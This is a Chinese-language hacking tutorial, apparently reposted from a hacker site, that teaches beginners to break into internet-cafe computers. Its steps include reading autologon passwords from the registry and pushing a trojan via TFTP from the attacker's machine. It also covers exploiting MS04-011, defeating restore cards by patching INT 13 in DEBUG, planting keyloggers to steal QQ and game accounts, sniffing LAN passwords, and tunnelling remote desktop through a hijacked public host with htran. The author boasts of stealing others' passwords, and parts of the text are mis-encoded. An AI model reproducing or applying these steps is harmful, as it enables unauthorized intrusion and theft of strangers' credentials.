作者：hacker.a… 文章來源：hacker.ab8.cn  
經(jīng)常看x檔案，發(fā)現(xiàn)關于破解pubwin和萬象的文章比較多，今天我決定寫點網(wǎng)吧入侵方面的文章，希望對一些小菜有所幫助.  
 一. 網(wǎng)吧入侵  
  入侵的方法很多，但對網(wǎng)吧入侵最常用的方法是什么呢？首先，自動登陸?，F(xiàn)在網(wǎng)吧一般都是win2000或者windows xp的機器，網(wǎng)管一般都把機子設置為自動登陸！這樣我們開機進入系統(tǒng)的時候登陸窗口一閃而過！著時候如果我們findfass.exe試圖把登陸賬號密碼找出來是不會成功的！因為賬號密碼根本不在內存中，而findfass.exe通過winlogon的PID號和正確的域名中，在內存尋找好段加了密的內存塊(保存著加密過的登陸密碼)，然后對它進行解密，這樣就能得到明文的密碼。實際上自動登陸的賬號密碼都在注冊表中。我們打開注冊表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\這個目錄下，AutoAdminLogon這一項的鍵值為1，表示自動登陸。為1的時候，打開控制面板的用戶和密碼，會發(fā)現(xiàn)需要密碼前面的鉤已經(jīng)去掉了。DefaultUserName對應的鍵值就是登陸用戶名，DefaultPassword對應的鍵值就是登陸密碼。實際上海洋頂端木馬2006就有著一功能，原理是一樣的，不過因為權限的問題，不一定能讀出來。這樣，密碼賬號我們都找出來了。而且你要知道，一個網(wǎng)吧的自動登陸密碼賬號一般都是一樣的，而且網(wǎng)管為了方便網(wǎng)蟲上網(wǎng)一般把他們設置在管理員組，至少user組。知道了密碼賬號還愁入侵不了么？網(wǎng)吧機子的server服務一般是禁用的，那我們就不能用ipc入侵了。opentelnet.exe我們也用不了，因為著個也依賴ipc連接，dameware遠程控制也不行，道理一樣。我們可以用recton著個小巧實用的工具來開telnet，這個工具在win2000下面特別好使。  
如圖1。  
開了telnet后，我們telnet上去，先在本機打開tftpd32.exe,再telnet下面telnet -i myip get 3721.exe c:\3721.exe,這樣就把我們的木馬3721.exe比如radmin傳過去了。  
再在telnet下面直接運行3721.exe就ok了。  
 　 另一個方法就是ms04011漏洞，別以為著個漏洞已經(jīng)過時了，在網(wǎng)吧這個漏洞還是相當普遍的，許多網(wǎng)吧的網(wǎng)管只會裝游戲，重裝系統(tǒng)，不重視著寫漏洞，懶得打補??！我們用DSScan掃描192.168.0.1-192.168.0.255,一般會你會很驚喜的。我們到用ms04011溢出工具溢出，一下子就得到了系統(tǒng)權限。  
如圖3.  
 　 還有很多入侵方法，你可以把xscan搬出來掃描一下。很多菜鳥喜歡用啊D工具包來掃網(wǎng)吧的空口令，實際上這個工具掃用戶賬號密碼很弱，以前我試過，我用上面第一種方法發(fā)現(xiàn)網(wǎng)吧都有一個密碼為空的管理員賬號，用啊D工具包只掃出幾臺機子有這個賬號。我經(jīng)常用我的最愛  
閃電狐——火狐端口掃描器來掃一下網(wǎng)吧主機，第一服務器等。著個掃描器速度很快，掃1到10000端口也要不了幾分鐘。如果發(fā)現(xiàn)服務器開80斷口，自然是看是不是架設了網(wǎng)站。再看網(wǎng)站十分有漏洞，想辦法傳個asp木馬上去提升權限。如果發(fā)現(xiàn)電影服務器裝了serv_u,而且你有了一個賬號，可以嘗試一下serv_u的溢出。  
 　　　　　　　　　　　　　　　　　　　　　　　　 二.網(wǎng)吧牧馬  
在網(wǎng)吧安裝木馬最重要的是把它的還原破了，現(xiàn)在網(wǎng)吧的還原系統(tǒng)一般有3種，即還原卡，還原精靈，冰點還原精靈。硬盤還原卡其實所謂硬盤保護卡就是在ROM中寫了一段HOOK INT 13的程序，屏蔽了  
一些功能調用如AH=3，5等，在中斷向量表中INT 13的SEG，OFFSET  
描述為[13h*4+2]，[13h*4]，將此中的程序先保存后，再替換為自己的代碼，  
當你AH=2的時，它便會call原始INT 13地址來完成(商周)作.  
只要找到原始INT 13入口便可以為所欲為.  
具體過程如下:  
開機過程按住F8鍵,進入純dos環(huán)境, 注";"后為注釋.  
出現(xiàn)提示符c:,  
鍵入c:\debug,  
- a100  
- xor ax,ax  
- int 13  
- int3  
; 尋找原始的int 13入口.  
然后輸入t回車，不斷的重復，直到顯示的地址形如 F000:xxxx  
,后面的指令為:mov dl,80 (練練眼力-。按q退出.  
記下這一地址, 在(0:13H*4)=0:4cH 處填入這個地址。  
例如俺的得到的地址是F000:9A95  
再次運行debug ,鍵入:  
-e 0:4c 95 9A 00 F0 e的作用將數(shù)據(jù)表"95 9A 00 f0",寫入地址0:4c開始的字節(jié)中.  
-q  
注： 填的時候要仔細，填錯的話會死機。ok,破解完成.  
這時在提示符c:\鍵入  
c:\win  
進入windows系統(tǒng)即可,那么這次你在windows系統(tǒng)中的一切(商周)作,隨著下一次  
的啟動都會被還原卡存儲起來。  
這種辦法大家都知道，不過操作起來也有點危險，弄不好啟動不了。而且win2000沒有dos環(huán)境,到底性不行呢？呵呵，我還沒有  
做這個危險的嘗試。不過望上有很多關于破解還原卡的工具可以下載，到底什么工具最好使，大家自己測試。  
至于還原卡，網(wǎng)上有密碼讀取器，不過著工具只能在win98下面使用。在win2k下面我們可以用winhex來破解，次方法很奏效，  
應該是最好的辦法。先隨便輸個錯誤的密碼，彈出錯誤窗口后不動，用winhex查找主要內存，找到還原精靈，再搜索我們開始  
輸?shù)腻e誤密碼。在錯誤密碼的旁邊應該就有正確的密碼。我們輸入正確的密碼轉存就行了。這里很簡單，就不截圖了！  
 　至于冰點還原，好像還沒有破解辦法，這個的確很厲害。不過他有個選項，就是重啟多少次后不還原，沒事你可以多重啟  
試一下，別把機子整壞了就行。  
 　破了還原后就裝木馬了。我們最好裝鍵盤記錄或密碼截獲木馬，盜qq，游戲賬號，郵箱賬號等等。比如密碼結巴等工具，也可以  
把瀏覽器默認主頁設置為你的網(wǎng)頁木馬。如果網(wǎng)吧的默認主頁都是一樣，而你有能力入侵了那個網(wǎng)站，在默認主頁上掛馬那更好！  
三.網(wǎng)吧嗅探。  
 　如果你想知道網(wǎng)吧某個mm的qq號，那你就用QQSniffer,Ver2005build5.5。也可以用xniffer,用于嗅探域網(wǎng)中或本機的pop.smtp.ftp等明文傳輸?shù)膖cp/ip協(xié)議密碼。格式是 xsiff.exe -pass -hide -log pass.log　xsiff.exe -tcp -udp -asc -addr 192.168.1.1。如果你不喜歡著個，還有個密碼監(jiān)聽器，密碼監(jiān)聽器用于監(jiān)聽網(wǎng)頁的密碼，包括網(wǎng)頁上的郵箱、論壇、聊天室等等。只需在一臺電腦上運行，就可以監(jiān)聽局域網(wǎng)內任意一臺電腦登錄的賬號和密碼，并將密碼顯示、保存，或發(fā)送到用戶指定的郵箱。我就經(jīng)常有密碼監(jiān)聽器2.4破解版在網(wǎng)吧監(jiān)聽別人  
密碼！當然網(wǎng)吧最適合dns欺騙！  
如圖3。  
四.端口轉發(fā)。  
 　為了能隨時隨地控制網(wǎng)吧機器，在家也可以！我們最好來個端口轉發(fā)。首先我們可以用fport.exe(這個工具在angelshell1.0包里面有）,格式為fport 但是使用他可以不必安裝后門，只需要普通的權限即可執(zhí)行。網(wǎng)吧服務器一般是win2000server版的，我們趁管理員不注意，給他開3389。如果他的ip為192.168.0.1，我們就在他的命令行下執(zhí)行fport.exe 3389 myip 9999,這里的myip可以是我們的一只有公網(wǎng)ip的肉雞。我們再在公網(wǎng)ip的肉雞上運行FportClient.exe著個是客戶端。著樣我們登陸公網(wǎng)ip的肉雞的9999端口就進了網(wǎng)吧主機。在上面看第電影趕什么都行，不被發(fā)現(xiàn)就行了，我們動作輕點就行了。我們也可以給網(wǎng)吧主機裝代理。就用htran2.4,SocksCap。在網(wǎng)吧主機命令行下上執(zhí)行htran.exe -install （安裝Socks5服務），htran.exe -start （啟動Socks5服務），再執(zhí)行"htran.exe -s -connect 共網(wǎng)肉雞ip 3389。在自己的共網(wǎng)肉雞上執(zhí)行htran.exe -s -listen 3389 5200（監(jiān)聽端口）.現(xiàn)在用SocksCap連接 218.3.1.1 的5200端口，就等于進入了網(wǎng)吧主機。我們也可以  
用vidc來映射端口，這個和fport差不多就不多說了。  
到這里本文要結束了，其實也沒有什么高深的技術，高手見笑了。其實入侵的時候會碰到各種各樣的問題，能否解決這這些問題。是高手和菜鳥的本質區(qū)別！希望喜歡交流技術的朋友和我聯(lián)系，我的qq是：156544632。我的站  
轉  

最新評論